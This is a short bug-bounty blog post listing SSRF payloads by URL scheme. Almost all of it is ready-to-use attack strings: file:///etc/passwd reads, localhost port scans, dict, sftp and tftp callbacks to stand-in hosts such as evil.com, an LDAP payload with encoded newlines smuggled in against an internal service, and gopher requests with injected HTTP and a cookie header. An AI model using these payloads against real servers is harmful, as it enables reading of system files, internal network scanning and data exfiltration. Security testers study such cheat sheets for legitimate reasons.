SSRF exploitation via URL Scheme

October 2, 2021 localghost Bug Bounty Tips 0

SSRF exploitation via URL Scheme

1-File:Allows an attacker to fetch the content of a file on the server

file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd

2-HTTP:Allows an attacker to fetch any content from the web,it can also be used to scan ports ssrf.php?url=http://127.0.0.1:22 ssrf.php?url=http://127.0.0.1:80 ssrf.php?url=http://127.0.0.1:443

3-Dict:DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol =dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> =ssrf.php?url=dict://attacker:11111/

4-SFTP:A network protocol used for secure file transfer over secure shell ssrf.php?url=sftp://evil.com:11111/ 5-TFTP:Trivial File Transfer Protocol, works over UDP ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

6-LDAP: It is an application protocol used over an IP network to manage and access the distributed directory information service ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

7-Gopher HTTP gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A

gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body

3

#SSRF #exploitation #BugBounty

Be the first to comment

Leave a Reply

Your email address will not be published.


*